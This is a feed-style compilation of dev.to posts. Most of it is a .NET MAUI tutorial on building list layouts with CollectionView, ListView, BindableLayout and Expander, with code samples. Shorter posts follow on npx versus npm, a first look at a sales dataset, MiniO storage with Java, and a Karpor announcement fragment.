The list of EV charging station reviews in the [PlugShare](https://www.plugshare.com) mobile app modeled the next sample. While the template is not very complex, it does have a variable-length string that wraps in a `Label`. This _was_ problematic in early releases of .NET MAUI, where the text would be clipped or flow offscreen. By default, the `ItemSizingStrategy` is to measure only the first item and assume all the rest of the items are the same size. This is much more performant for obvious reasons. To accommodate the variable sizing, I need to use a strategy that measures all items or each item individually. In practice, this performs well and scrolls very smoothly.
```xml
<CollectionView ItemsSource="{Binding Reviews}"
                ItemSizingStrategy="MeasureAllItems">
    <CollectionView.ItemTemplate>
        <DataTemplate>
            <v:ReviewListItem />
        </DataTemplate>
    </CollectionView.ItemTemplate>
</CollectionView>
```

```xml
<Grid ColumnDefinitions="40,*" RowDefinitions="Auto,Auto" ColumnSpacing="8" Margin="16">
    <Image Source="{Binding StatusImage}"
           Grid.Column="0"
           Grid.RowSpan="2"
           HeightRequest="20"
           WidthRequest="20"
           VerticalOptions="Start"
           HorizontalOptions="Center"/>
    <VerticalStackLayout Grid.Column="1" Spacing="8">
        <Label Text="{Binding Author}" FontSize="18" FontAttributes="Bold" />
        <Label Text="{Binding Comment}" MaxLines="5" Margin="0,0,0,8" />
        <Label Text="{Binding Car}" TextColor="Gray"/>
        <Label Text="{Binding ChargerType}" TextColor="Gray"/>
    </VerticalStackLayout>
    <Label Text="{Binding CreatedAt, StringFormat='{0:MM/dd/yyyy}'}"
           Grid.Row="0"
           Grid.Column="1"
           FontSize="10"
           TextColor="Gray"
           HorizontalOptions="End"
           VerticalOptions="Start" />
    <BoxView HeightRequest="1"
             BackgroundColor="LightGray"
             VerticalOptions="End"
             Grid.Column="1"
             TranslationY="16" />
</Grid>
```

References:

* [CollectionView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/?view=net-maui-8.0)
* [ItemSizingStrategy](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/layout?view=net-maui-8.0#item-sizing)

## Layout 3: Social Check-in [Uneven rows, Complex Layout]

{% embed https://youtu.be/UULzWNRskNc %}

For this sample, I took inspiration from [Untappd](https://untappd.com), a social beer enthusiast app. The Activity feed shows the beer check-ins of your friends, including a rating and an optional photo. When the photo is present, the template is a bit taller, so I again need to handle uneven rows. In this scenario, `CollectionView` has a clear advantage over `ListView` because I can specify spacing between items via the `LinearItemsLayout`.
```xml
<CollectionView ItemSizingStrategy="MeasureAllItems"
                ItemsSource="{Binding CheckIns}">
    <CollectionView.ItemsLayout>
        <LinearItemsLayout Orientation="Vertical" ItemSpacing="10" />
    </CollectionView.ItemsLayout>
    <CollectionView.ItemTemplate>
        <DataTemplate>
            <v:CheckInListItem />
        </DataTemplate>
    </CollectionView.ItemTemplate>
</CollectionView>
```

To accommodate the different looks, I could have opted for a [DataTemplateSelector](https://learn.microsoft.com/dotnet/maui/fundamentals/datatemplate?view=net-maui-8.0#create-a-datatemplateselector), but I chose instead to add a `HasImage` read-only property to the model in order to show/hide the `Image` control as well as adjust the Y position of the content.

```csharp
public class Product
{
    ///...

    public bool HasImage => !string.IsNullOrWhiteSpace(ImageUrl);
}
```

```xml
<Border Grid.Row="1"
        TranslationY="{Binding Product.HasImage, Converter={StaticResource BoolToIntConverter}}"
```

I had not previously used the `BoolToObjectConverter` from the [.NET MAUI Community Toolkit](https://learn.microsoft.com/dotnet/communitytoolkit/maui/converters/bool-to-object-converter). What a tasty discovery!

```xml
<mct:BoolToObjectConverter x:Key="BoolToIntConverter" TrueObject="-60" FalseObject="0"/>
```

Also great for flip-flopping colors.

```xml
<mct:BoolToObjectConverter x:Key="BoolToColorBrushConverter" TrueObject="#FFFFFF" FalseObject="#000000"/>
```

References:

* [.NET MAUI Community Toolkit](https://learn.microsoft.com/dotnet/communitytoolkit/maui/)
* [FontAwesome Icons](https://fontawesome.com)
* [Lorem Picsum Photos](https://picsum.photos)
* [Rating Control](https://www.nuget.org/packages/pankaj.util.RatingControl)

## Layout 4: Learning Course [Expand and Contract]

{% embed https://youtu.be/RE_H8rV3by4 %}

Those of you who know me are aware I enjoy language learning. One of the apps I've used called [TEUIDA](https://www.teuida.net) has a nice UI that presents courses in units and lessons.
Tapping a unit expands it to display the different lessons with chapters in a table-of-contents, roadmap fashion. Originally, I tried this with `CollectionView` and `ListView`, but this confirmed a bug in .NET MAUI on iOS where resizing at runtime doesn't trigger the rest of the list control to resize as you would expect. As of version 8.0.60, this works great on Android.

As I evaluated the content to be displayed, I recognized I don't have a LOT of data. On each page of the app, I usually have four units, each with a variable number of chapters and lessons that never exceeds 10. For these reasons, I chose to use [`BindableLayout`](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0). In fact, this sample uses three nested `BindableLayout`s. 😲 Did this become a problem? Nope.

`BindableLayout` is a bit of an odd duck, and perhaps in retrospect it should have been a standalone control like the others. Instead it's an attached property that you can add to any other layout. So rather than starting with the control and specifying a layout like with `CollectionView`, you start with the layout you prefer and tag on the items source and data template. Simple enough.

```xml
<ScrollView>
    <VerticalStackLayout Spacing="10"
                         BindableLayout.ItemsSource="{Binding Items}">
        <BindableLayout.ItemTemplate>
            <DataTemplate>
                <v:LearningUnitListItem />
            </DataTemplate>
        </BindableLayout.ItemTemplate>
    </VerticalStackLayout>
</ScrollView>
```

The `LearningUnitListItem` displays the primary box and a hidden list that is a loop over the chapters and lessons. To expand and contract the list of chapters and lessons, I'm simply using a click handler and toggling the visibility of the `VerticalStackLayout` that contains that content.
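That toggle can be as simple as a `TapGestureRecognizer` on the unit's visible box. This is my own sketch, not code from the sample — the `OnUnitTapped` handler name and the `LessonsContent` element name are assumptions:

```xml
<!-- Hypothetical sketch: OnUnitTapped and LessonsContent are assumed names. -->
<VerticalStackLayout>
    <VerticalStackLayout.GestureRecognizers>
        <TapGestureRecognizer Tapped="OnUnitTapped" />
    </VerticalStackLayout.GestureRecognizers>

    <!-- the always-visible unit box goes here -->

    <VerticalStackLayout x:Name="LessonsContent" IsVisible="False">
        <!-- nested BindableLayout over chapters and lessons goes here -->
    </VerticalStackLayout>
</VerticalStackLayout>
```

where the code-behind handler simply flips `LessonsContent.IsVisible`.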
References:

* [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0)

## Layout 5: Who's Watching [Flex layout]

{% embed https://youtu.be/kt6TiI_Bko8 %}

Inspired by Netflix, Disney+, and "insert other streaming service," I made a "Who's Watching" sample. This one is very simple. It's a `FlexLayout` with `BindableLayout`.

```xml
<FlexLayout Direction="Row"
            JustifyContent="Center"
            Wrap="Wrap"
            BindableLayout.ItemsSource="{Binding WhoIsWatching}"
            VerticalOptions="Center">
    <BindableLayout.ItemTemplate>
        <DataTemplate x:DataType="m:Contact">
            <VerticalStackLayout HorizontalOptions="Center"
                                 Spacing="8"
                                 FlexLayout.Basis="40%"
                                 FlexLayout.AlignSelf="Start">
                <Image Source="{Binding ProfilePicture}"
                       WidthRequest="80"
                       HeightRequest="80"
                       Aspect="AspectFill"
                       BackgroundColor="Transparent">
                    <Image.Clip>
                        <EllipseGeometry Center="40, 40" RadiusX="40" RadiusY="40" />
                    </Image.Clip>
                </Image>
                <Label Text="{Binding FirstName}" HorizontalOptions="Center" />
            </VerticalStackLayout>
        </DataTemplate>
    </BindableLayout.ItemTemplate>
</FlexLayout>
```

References:

* [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0)
* [FlexLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/flexlayout?view=net-maui-8.0)

## Layout 6: Mailboxes [Expand and Contract]

{% embed https://youtu.be/95Edxbryyws %}

To reproduce the Mailboxes UI as seen in Mail on iOS, I chose `BindableLayout` and `Expander` from the .NET MAUI Community Toolkit. While a user could end up with a lot of mail accounts that would then benefit from some virtualization, it seems reasonable to start here and grow up into a `CollectionView` when necessary.

Since I've covered the use of `BindableLayout` already, I'll focus now on the `Expander`. The control has two main parts, the header and the content. The header is always visible, and the content is shown or hidden based on user interaction.
In order to toggle the chevron indicator for open/closed, I started with two `Label` controls to display the font icons and used a relative source binding to watch the `IsExpanded` property of the parent control. Since I'm within the control, I can reference it this way rather than by name. I refactored this to a single `Label` and used the magnificent `BoolToObjectConverter`. How did I ever code without that?!

```xml
<mct:Expander>
    <mct:Expander.Header>
        <Grid ColumnDefinitions="*,100,50" RowDefinitions="40">
            <Label Text="Ortinau"
                   Grid.Column="0"
                   FontSize="Subtitle"
                   VerticalOptions="Center" />
            <Label Text="38386"
                   Grid.Column="1"
                   Style="{StaticResource SecondaryLabel}"
                   HorizontalOptions="End"
                   HorizontalTextAlignment="End"
                   IsVisible="{Binding Path=IsExpanded, Source={RelativeSource AncestorType={x:Type mct:Expander}}, Converter={StaticResource InvertedBoolConverter}}" />
            <Label Text="{Binding Path=IsExpanded, Source={RelativeSource AncestorType={x:Type mct:Expander}}, Converter={StaticResource BoolToChevronConverter}}"
                   FontSize="14"
                   FontFamily="FluentUI"
                   Style="{StaticResource SecondaryLabel}"
                   TextColor="{StaticResource ActionColor}"
                   Grid.Column="2"
                   VerticalOptions="Center"
                   HorizontalOptions="Center" />
        </Grid>
    </mct:Expander.Header>
    <mct:Expander.Content>
        <Border>
            <VerticalStackLayout>
                <BindableLayout.ItemsSource>
                    ...
                </BindableLayout.ItemsSource>
                <BindableLayout.ItemTemplate>
                    <DataTemplate x:DataType="m:Mailbox">
                        <Grid ColumnDefinitions="60,*,100,50" RowDefinitions="40,1">
                            <Image Aspect="Center"
                                   HorizontalOptions="Center"
                                   VerticalOptions="Center">
                                <Image.Source>
                                    <FontImageSource Glyph="{Binding Icon}"
                                                     FontFamily="FluentUI"
                                                     Size="18"
                                                     Color="{StaticResource ActionColor}" />
                                </Image.Source>
                            </Image>
                            <Label Text="{Binding Name}"
                                   Grid.Column="1"
                                   FontSize="14"
                                   VerticalOptions="Center" />
                            <Label Text="{Binding UnreadCount}"
                                   Grid.Column="2"
                                   Style="{StaticResource SecondaryLabel}"
                                   HorizontalOptions="End"
                                   HorizontalTextAlignment="End" />
                            <Label Text="{x:Static f:FluentUI.chevron_right_12_regular}"
                                   Grid.Column="3"
                                   Style="{StaticResource SecondaryLabel}"
                                   VerticalOptions="Center"
                                   FontSize="14"
                                   FontFamily="FluentUI"
                                   HorizontalOptions="Center" />
                            <BoxView Grid.ColumnSpan="4"
                                     Grid.Row="1"
                                     Margin="16,0,0,0"
                                     HeightRequest="1"
                                     Color="{AppThemeBinding Light=#f3f3f4, Dark=#333333}" />
                        </Grid>
                    </DataTemplate>
                </BindableLayout.ItemTemplate>
            </VerticalStackLayout>
        </Border>
    </mct:Expander.Content>
</mct:Expander>
```

References:

* [BoolToObjectConverter](https://learn.microsoft.com/dotnet/communitytoolkit/maui/converters/bool-to-object-converter)
* [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0)
* [Expander](https://learn.microsoft.com/dotnet/communitytoolkit/maui/views/expander)
* [Relative bindings](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/relative-bindings?view=net-maui-8.0)

## Layout 7: Contacts [Grouping, Search]

{% embed https://youtu.be/R0KAUwHju9M %}

Getting back into a sample with the need for virtualization, grouping, and search, I reproduced a Contacts list.

### Header

My contact needed to appear at the top of the list and scroll away before the rest of the content. For that, I added a header to the `ListView`.
Notice it does NOT take a `DataTemplate` since there can be only one of these and there's no need to instantiate it lazily.

```xml
<ListView.Header>
    <HorizontalStackLayout Spacing="16" Padding="16">
        <Border StrokeShape="RoundRectangle 40" StrokeThickness="0">
            <Image Source="avatar_01.png"
                   WidthRequest="80"
                   HeightRequest="80"
                   Aspect="AspectFill"
                   VerticalOptions="Center" />
        </Border>
        <Label Text="David Ortinau"
               FontSize="20"
               FontAttributes="Bold"
               VerticalOptions="Center" />
    </HorizontalStackLayout>
</ListView.Header>
```

### Grouping

Preparing your data sources to be grouped and searchable is the first step. In my approach, I get all my contacts in an ordered flat list, group them by the first initial of the last name, and then add them to a list of grouped contacts. The final piece is copying that into a separate, unfiltered list against which I can perform searches.

```csharp
_contacts = MockDataService.GenerateContacts().OrderBy(c => c.LastName).ThenBy(c => c.FirstName).ToList();

ContactsGroups = new List<ContactsGroup>();

var groupedContacts = _contacts.GroupBy(c => c.LastName[0]).OrderBy(g => g.Key);

foreach (var group in groupedContacts)
{
    var contactsGroup = new ContactsGroup(group.Key.ToString(), group.ToList());
    ContactsGroups.Add(contactsGroup);
}

_unfilteredContactsGroups = new List<ContactsGroup>(ContactsGroups);
```

To display the grouped list, I went with `ListView` primarily because this scenario is one of the fundamental scenarios it was made for. To group, I set `IsGroupingEnabled="True"` and provide a template for the group header.

```xml
<ListView.GroupHeaderTemplate>
    <DataTemplate>
        <ViewCell>
            <Label Text="{Binding GroupName}"
                   FontSize="18"
                   FontAttributes="Bold"
                   Padding="12,0,0,0"
                   VerticalOptions="Center"
                   Background="Transparent" />
        </ViewCell>
    </DataTemplate>
</ListView.GroupHeaderTemplate>
```

And just like that I have the basic grouped list.

### Search

.NET MAUI provides a `SearchBar` control, so I added that above the `ListView` on the page.
As the user types, the `SearchCommand` is executed. The `Text` property does default to a `TwoWay` binding, so I didn't need to specify that, but I wasn't sure until [reading the documentation](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/binding-mode?view=net-maui-8.0#two-way-bindings) on binding modes while writing this post. ;)

```xml
<SearchBar x:Name="SearchBar"
           Placeholder="Search"
           Text="{Binding SearchText, Mode=TwoWay}"
           SearchCommand="{Binding SearchCommand}"
           VerticalOptions="Start"
           BackgroundColor="{AppThemeBinding Light=White, Dark=Black}" />
```

The search command filters down the unfiltered list and repopulates the `ContactsGroups` that is bound to the `ListView`.

```csharp
[RelayCommand]
void Search()
{
    if (string.IsNullOrWhiteSpace(SearchText))
    {
        // If the search text is empty, show all contacts
        ContactsGroups = _unfilteredContactsGroups;
    }
    else
    {
        // If the search text is not empty, show only contacts that contain the search text
        ContactsGroups = _unfilteredContactsGroups
            .Where(g => g.Any(c => c.FirstName.Contains(SearchText, StringComparison.InvariantCultureIgnoreCase) ||
                                   c.LastName.Contains(SearchText, StringComparison.InvariantCultureIgnoreCase)))
            .ToList();
    }
}
```

BUT I had a problem: I would type, and the list would filter, but I was also getting results I didn't expect. Why?! I explained my situation to Copilot, and it explained (as I suspected) that I was only filtering the groups, not the contacts within each group. Copilot provided the solution.
```csharp
ContactsGroups = _unfilteredContactsGroups
    .Select(g => new ContactsGroup(g.GroupName,
        g.Where(c => c.FirstName.Contains(SearchText, StringComparison.OrdinalIgnoreCase) ||
                     c.LastName.Contains(SearchText, StringComparison.OrdinalIgnoreCase)).ToList()))
    .Where(g => g.Any())
    .ToList();
```

References:

* [ListView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0)
* [ListView grouping](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0#display-grouped-data)
* [ListView header](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0#headers-and-footers)
* [RelayCommand](https://learn.microsoft.com/dotnet/communitytoolkit/mvvm/generators/relaycommand)
* [SearchBar](https://learn.microsoft.com/dotnet/maui/user-interface/controls/searchbar?view=net-maui-8.0)

## Layout 8: Shopping [Header, Data template selector, infinite scroll]

{% embed https://youtu.be/wALbd1Ae4dg %}

Inspired by the [Adidas app](https://www.adidas.com/us/mobileapps), I had a bit of fun making this one. In addition to a header and making product images with ChatGPT, the display pattern is unique. You begin thinking it's going to be a grid layout with two columns, but then after four rows, you hit a product that spans both columns. Ok, so 4 and then 1, right? Wrong. From there on out it's 2 and 1. 🤯

Because I need to load data in batches as the user reaches the end of the list, I chose `CollectionView`, which has this feature built-in.

### Filter Header

So the header is simple: a horizontal scrolling set of buttons to filter the list.
```xml
<CollectionView.Header>
    <v:FilterView />
</CollectionView.Header>
```

`FilterView.xaml`

```xml
<Grid ColumnDefinitions="Auto,*" ColumnSpacing="16" Margin="16,16,-16,16">
    <Image HeightRequest="24"
           WidthRequest="24"
           Aspect="Center"
           Background="Transparent">
        <Image.Source>
            <FontImageSource FontFamily="FontAwesome"
                             Glyph="{x:Static f:FontAwesome.Filter}"
                             Size="14"
                             Color="{AppThemeBinding Light={StaticResource Gray900}, Dark={StaticResource Gray300}}"/>
        </Image.Source>
    </Image>
    <ScrollView Orientation="Horizontal" Grid.Column="1" HorizontalScrollBarVisibility="Never">
        <HorizontalStackLayout Spacing="8">
            <Button Text="705" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="SAMBA" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="GAZELLE" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="ULTRABOOST" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="ADIZERO" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="FORUM" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="SUPERSTAR" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="CAMPUS" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="LITE RACER" Style="{StaticResource FilterButtonStyle}" />
            <Button Text="2000S" Style="{StaticResource FilterButtonStyle}" />
        </HorizontalStackLayout>
    </ScrollView>
</Grid>
```

Of course, in a real app the buttons would be sourced from some collection and I would use a `BindableLayout` for them.

### Funky Layout Pattern

How could I achieve this layout pattern? I chose to massage the data to represent how it would be displayed. That's what a ViewModel is for anyway. With more help from Copilot, I told it the pattern I needed to achieve and watched the code flow! I KNOW KUNG FU!!!
```csharp
_productDisplays = new List<ProductDisplay>();

for (int i = 0; i < count; i++)
{
    if (i < 4)
    {
        _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2, 2) });
    }
    else if (i % 3 == 1)
    {
        _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2 - 1, 1) });
    }
    else
    {
        _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2 - 2, 2) });
    }
}
```

Seeing `GenerateProducts()` repeated may look like it's regenerating data over and over, but I'm actually returning the cached data set once it's populated. It doesn't read well, I admit.

Now that I have the data representing the pattern I need of 4:1:2:1:2:1:2:1 etc., I can move on to the data template. The `CollectionView` implements a linear items layout by default, and that's just fine. Using a data template selector, I can have two templates based on how many items I need to display: Mono and Duo.

```csharp
public class ShopTemplateSelector : DataTemplateSelector
{
    public DataTemplate MonoTemplate { get; set; }
    public DataTemplate DuoTemplate { get; set; }
    public DataTemplate LoadingMoreTemplate { get; set; }

    protected override DataTemplate OnSelectTemplate(object item, BindableObject container)
    {
        ProductDisplay productDisplay = (ProductDisplay)item;

        if (productDisplay.IsLoading)
        {
            return LoadingMoreTemplate;
        }

        return ((ProductDisplay)item).Products.Count < 2 ? MonoTemplate : DuoTemplate;
    }
}
```

The `DuoTemplate` is the more interesting one, as it just displays two `MonoTemplate`s side by side.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentView xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
             xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
             xmlns:v="clr-namespace:AllTheLists.Views"
             xmlns:m="clr-namespace:AllTheLists.Models"
             x:DataType="m:ProductDisplay"
             x:Class="AllTheLists.Views.DuoProductListItem">
    <Grid ColumnDefinitions="*,*" ColumnSpacing="4">
        <v:MonoProductListItem Grid.Column="0" BindingContext="{Binding Products[0]}" />
        <v:MonoProductListItem Grid.Column="1" BindingContext="{Binding Products[1]}" />
    </Grid>
</ContentView>
```

And just like that, I have the display I need, and I don't feel like it's overly complex.

### Infinite Scrolling

As the user reaches near the end of the list, I need to start fetching more data and display an indicator to the user that this is happening. The indicator is meant to appear at the bottom of the list.

The `CollectionView` has properties to help with the first part. `RemainingItemsThreshold` tells the control that when that many items remain to be displayed, it should raise the `RemainingItemsThresholdReached` event and execute the `RemainingItemsThresholdReachedCommand`. In my case, I use both the event and the command, but you may only need the command. More on why I do this below.

```xml
RemainingItemsThreshold="4"
RemainingItemsThresholdReached="CollectionView_RemainingItemsThresholdReached"
RemainingItemsThresholdReachedCommand="{Binding OnThresholdReachedCommand}"
```

The `OnThresholdReachedCommand` fetches more data and appends it to the end of the `ObservableCollection`.
```csharp
[RelayCommand]
async Task OnThresholdReached()
{
    if (IsLoadingMore)
        return;

    IsLoadingMore = true;

    VisibleProducts.Add(new ProductDisplay { IsLoading = true });

    await Task.Delay(4000); // fake a server call delay, allows the loading template to show

    VisibleProducts.Remove(VisibleProducts.Last());

    var newProducts = Products.Skip(VisibleProducts.Count).Take(16);
    foreach (var product in newProducts)
    {
        VisibleProducts.Add(product);
    }

    await Task.Delay(200); // tiny delay for a ui refresh

    IsLoadingMore = false;
}
```

The attentive reader will have noticed some code in the data template selector from the previous section, which connects now with the command above. As soon as the call is made to get more data, I create a blank `ProductDisplay` object which has one job: to tell the user `IsLoading=true`. In the data template selector, I opt to display this special template and add it to the bottom of the list.

```csharp
if (productDisplay.IsLoading)
{
    return LoadingMoreTemplate;
}
```

As soon as my data arrives, I remove the last item from the collection and resume adding real data to be displayed. The `IsLoadingMore` boolean protects against calling this method while it's already in progress. Maybe there's a better way to do this, but old habits...

To wrap this up, why am I also handling the event with `CollectionView_RemainingItemsThresholdReached`? It's to work around a bug on one of the platforms where the command is not being executed.

```csharp
private void CollectionView_RemainingItemsThresholdReached(object sender, EventArgs e)
{
    ((ProductDisplaysViewModel)BindingContext).OnThresholdReachedCommand.Execute(null);
}
```

## Conclusion

In conclusion, when choosing the right control for your app scenario, you have options! Consider your specific requirements and the level of customization you need for your list or layout. Prefer `CollectionView` over `ListView`, and don't ignore `BindableLayout`!
As I was writing this, I kept seeing more things to add and try, such as editing and ordering a list. I suppose that's what tomorrow is for.

All of my development here was done on .NET 9 previews using [VS Code Insiders](https://code.visualstudio.com/insiders/) and pre-release bits of the [.NET MAUI extension for VS Code](https://marketplace.visualstudio.com/items?itemName=ms-dotnettools.dotnet-maui) on a MacBook Pro M1. The addition of XAML IntelliSense and XAML/C# Hot Reload has been great.

One final piece of advice I have to share is to consider all options when solving for a scenario. Choosing a control is only one element. Shaping your data is another. Adapting UX patterns is yet another. While technology may be inflexible and at times will work against you, rather than trying to brute-force your way to success, remember that you are flexible! I have found this to be a key to success no matter what language or technology I've used.

I hope this has been a fun read and you have found a takeaway or two. Maybe you have a better way to do something, or you hate how I did it. Code can be a very personal thing. Whatever your reaction, be energized to go make something amazing to share with the world.
davidortinau
1,909,057
NPX vs NGX vs NPM
npx: an npm package runner Enter fullscreen mode Exit fullscreen mode ...
0
2024-07-02T15:03:49
https://dev.to/kiranuknow/npx-vs-ngx-3f7m
``` npx: an npm package runner ``` ``` ngx packages are used by Angular ngx : used by Angular to run Angular projects. ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/07g76yhhoxk7duhg6erf.png) NPM => Is a JS package manager. NPX => Is a tool for executing Node packages and execute npm package binaries. It is easy to remember: -npm stands for MANAGER -npx stands for EXECUTE
kiranuknow
1,909,056
FIRST GLANCE ANALYSIS
Hi guys, I have always wanted to write technical reports and share my knowledge in data analytics,...
0
2024-07-02T15:03:10
https://dev.to/benaj/first-glance-analysis-40k5
data, analytics, datacleaning, firstglance
Hi guys, I have always wanted to write technical reports and share my knowledge in data analytics, this is my first time and if I can, you can too! Today, I am going to be uncovering initial insights from a dataset at first glance. The data we are using contains 3 years of vehicle sales from 2003 - 2005. WOOAHHH! Long time ago, right? 😂 Well, that's the fun thing about data analytics, you get to go back in time. I LOVE IT and I am sure you can feel the thrill too. LET'S GOOOO!🤸‍♀️🚀 Data link below 👇 [Sale data link](https://docs.google.com/spreadsheets/d/1FgeHIjUj67rKU6XaDFXXKKmAf_Igc0UTds9ZaL8WY-o/edit?usp=sharing) Here comes the big question💡, without doing any deep analysis, what are the obvious patterns, trends, or anomalies in the data? I know , I know, data can seem overwhelming 😑, but don't worry, you've got this. Let's go!😋 Firstly, the headers are very important because they give us a description of the data we are looking at, with each variable having unique values that are relevant to understanding the full scope of the data. In this case, we can observe that some of the data headers are ambiguous which causes confusion on what the values are really describing. Example of such headers is MSRP. Secondly, Eagle-eyed observers would have seen the inconsistency of date, postal code and PHONE format, this can be troublesome when trying to perform deep analysis. Also, there are missing values for columns like postal code, state. Thirdly, we can perform simple calculations to find the year with the highest sales, trendy products or highest selling products, we can also find the most frequent/regular customer to award loyalty bonuses and the Country with the highest market potential or where most sales occur in order to streamline the company's target market. All these can be done using simple formulas. 
Finally, the following trends were uncovered by performing light analysis on the dataset, we can see a sudden upward surge in sales in 2004 followed by decrease in 2005 (all-time low). Also, we can observe that Classic cars are bought more often than other cars. {% codepen https://codepen.io/ben-aj/pen/xxNvLQN %} If we perform deeper analysis, start questioning our findings and finding out the WHYs, finding cause and trends that can help business decisions. It's so much like being a detective, a business Sherlock Holmes unlocking mysteries, and growing the revenue of this company, haha! 😁
benaj
1,780,887
Como Configurar e Integrar o MiniO com Java
O MiniO é uma solução de armazenamento compatível com S3, ideal para empresas que precisam armazenar...
0
2024-07-02T15:01:10
https://dev.to/adrianoaguiar/minio-com-spring-boot-32bl
O MiniO é uma solução de armazenamento compatível com S3, ideal para empresas que precisam armazenar dados internamente. Além de oferecer capacidade de armazenamento de arquivos, essa solução permite a criação de data lakes, sendo especialmente útil para profissionais que lidam com grandes volumes de dados. Neste artigo, vou demonstrar como configurar a integração com Java e realizar o envio de arquivos. Abordaremos os seguintes tópicos: - Vantagens de Usar o MiniO; - Levantando uma Imagem MiniO; - Tela de Acesso ao MiniO; - Configurando um Projeto em Java com MiniO; - Arquivo de Configuração; - Enviando Arquivos Usando o Postman; - Exemplo de Como Enviar um Arquivo para o MiniO; - Exemplo de Como Remover um Arquivo do MiniO; - Exemplo de Como Buscar um Arquivo pelo Nome no MiniO. Acompanhe o passo a passo detalhado para levantar uma imagem do MiniO, configurar seu projeto em Java e realizar o processo de envio de arquivos. **Qual a vantagem de usar** O MiniO é um servidor de armazenamento de objetos open-source e compatível com o S3 da Amazon, permitindo uma migração fácil para a Amazon. Além disso, está disponível para várias plataformas. Levantando uma Imagem MiniO: Vou explicar como iniciar uma imagem do MiniO no Docker e incluir as credenciais de acesso no arquivo docker-compose.yml. Abaixo está um exemplo: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/orfp052yxpx9etilq2wv.png) docker-compose up -d Para acessar localmente, basta informar a seguinte URL: http://localhost:9000/ E aqui está a tela de acesso: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b4ejh4vyc3nzsswdwfc6.png) Configurando um projeto em java com Minio: Como estou utilizando Maven, vou mostrar como adicionar as dependências necessárias no arquivo pom.xml: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/393f76uskjywwfcxvakn.png) Agora, precisamos iniciar o MiniO. 
Para isso, vamos criar um arquivo de configuração da seguinte forma: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m7h67sqs38d3t09g8d2q.png) No entanto, precisamos definir as variáveis de ambiente com as informações necessárias para que o projeto consiga se conectar ao MiniO. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y5yi337e1s4hbudeiyar.png) Arquivo de configuração: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bcerwldt3jui6o1g3mkh.png) Abaixo está um exemplo de como enviar um arquivo para o MiniO utilizando o Postman: - Abra o Postman e selecione o método POST. - Insira a URL do seu servidor MiniO Vá até a aba "Body" e selecione "form-data". - Adicione um campo com o nome file e, no valor, selecione o arquivo que deseja enviar. - Clique em "Send" para enviar o arquivo. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9msngix9dctfd1jpa7v5.png) Abaixo está um exemplo de como enviar um arquivo para o MiniO utilizando Java: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3eu1zrghrzz1o3km4qpd.png) Abaixo está um exemplo de código em Java para remover um arquivo do MiniO: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/no08m2538wslvs4ao0lo.png) Abaixo está um exemplo de como buscar um arquivo pelo nome no MiniO utilizando Java: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cwcmu3hp01l3jl7gsbmu.png) **Conclusão** Neste artigo, exploramos como o MiniO pode ser uma solução eficiente para o armazenamento de dados, oferecendo compatibilidade com o Amazon S3 e sendo uma alternativa open-source robusta. Abordamos desde a configuração do MiniO e a integração com Java até exemplos práticos de envio e remoção de arquivos. 
O MiniO se destaca por sua facilidade de uso e flexibilidade, permitindo que empresas de todos os tamanhos implementem soluções de armazenamento escaláveis e seguras. Com a configuração correta e o uso das APIs, é possível integrar o MiniO a diversas aplicações, proporcionando uma experiência de armazenamento de objetos eficiente e acessível. No próximo artigo, abordaremos como utilizar o MiniO com multitenancy, permitindo que você gerencie vários inquilinos de forma isolada e segura. Fique atento para aprender mais sobre essa funcionalidade avançada e como ela pode beneficiar ainda mais sua infraestrutura de armazenamento. Repositório do Projeto: https://github.com/adrianoaguiardez/minio-spring Visite o MiniO - Site Oficial do MiniO: https://min.io Documentação - Documentação Oficial: Documentação do MiniO GitHub - Repositório Oficial: https://github.com/minio/minio
adrianoaguiar
1,909,050
i will develop new and advanced software
A post by Bealu Girma
0
2024-07-02T14:45:23
https://dev.to/bealu_girma_b6761abb446ff/i-will-develop-new-and-advanced-software-8bb
**_[](url)_**
bealu_girma_b6761abb446ff
1,908,726
🚀 Karpor Has Been Open-Sourced! We Build a Kubernetes Visualization Tool in the AI era
🔔 What is Karpor? Today we are excited to announce that Karpor is now open-source! 🎉🎉🎉...
27,936
2024-07-02T15:00:00
